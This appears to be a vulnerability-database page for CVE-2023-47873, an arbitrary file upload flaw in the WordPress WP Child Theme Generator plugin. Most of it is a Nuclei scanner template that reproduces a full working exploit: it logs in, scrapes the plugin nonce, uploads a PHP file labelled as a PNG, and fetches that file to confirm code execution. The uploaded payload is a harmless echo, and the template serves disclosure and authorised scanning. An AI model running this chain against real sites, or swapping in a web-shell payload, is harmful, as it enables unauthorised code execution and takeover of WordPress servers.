CVE-2023-47873: WordPress WP Child Theme Generator < 1.1.3 - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: WordPress WP Child Theme Generator | POC: 已公开

漏洞描述

Unrestricted Upload of File with Dangerous Type vulnerability in WEN Solutions WP Child Theme Generator.This issue affects WP Child Theme Generator- from n/a through 1.0.9.

PoC代码[已公开]

id: CVE-2023-47873

info:
  name: WordPress WP Child Theme Generator < 1.1.3 - Arbitrary File Upload
  author: cysamu,Crux
  severity: critical
  description: |
    Unrestricted Upload of File with Dangerous Type vulnerability in WEN Solutions WP Child Theme Generator.This issue affects WP Child Theme Generator- from n/a through 1.0.9.
  remediation: Update to version 1.1.3 or later
  reference:
    - https://github.com/certuscyber/cve-pocs/tree/main/CVE-2023-47873
    - https://patchstack.com/database/wordpress/plugin/wp-child-theme-generator/vulnerability/wordpress-wp-child-theme-generator-plugin-1-0-8-arbitrary-file-upload-vulnerability
    - https://en-ca.wordpress.org/plugins/wp-child-theme-generator/
    - https://patchstack.com/database/vulnerability/wp-child-theme-generator/wordpress-wp-child-theme-generator-plugin-1-0-8-arbitrary-file-upload-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2023-47873
    cwe-id: CWE-434
    epss-score: 0.17833
    epss-percentile: 0.94896
    cpe: cpe:2.3:a:wensolutions:wp_child_theme_generator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: wensolutions
    product: wp_child_theme_generator
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wp-child-theme-generator/"
  tags: cve,cve2023,wordpress,wp-plugin,wp,wp-child-theme-generator,file-upload,authenticated,intrusive,rce

flow: http(1) && http(2) && http(3) && http(4)

variables:
  string: "{{to_lower(rand_base(8))}}"
  name: '{{to_lower(rand_text_alpha(6))}}'
  childauthor: "{{to_lower(rand_base(4))}}"
  description: "{{to_lower(rand_base(5))}}"
  filename: '{{to_lower(rand_text_alpha(6))}}'

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'len(body)==0'
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in_")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/themes.php?page=custom-child-theme HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Child Theme Gen")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - name="wp-easy-nonce" value="([0-9a-zA-Z]+)"
        part: body
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8

        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="childtheme"

        {{name}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="childauthor"

        {{childauthor}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="description"

        {{description}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="fileUpload"; filename="{{filename}}.php"
        Content-Type: image/png

        <?php echo "{{string}}";?>
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="wp-easy-nonce"

        {{nonce}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="action"

        child_theme
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="custom-child-create"

        Create Child Theme
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(location, "error_type=updated")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/themes/{{name}}/screenshot.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{string}}")'
        condition: and
# digest: 490a004630440220164dcc1bebbb09d703f44628904efcb10afdcc0b8d581b70225db30fc1ce96dd02202708ccd1251d2a517cfc40e4cd9eb0ae3d8e9cbae76fb09ab3dbbad7f3776f4a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47873.yaml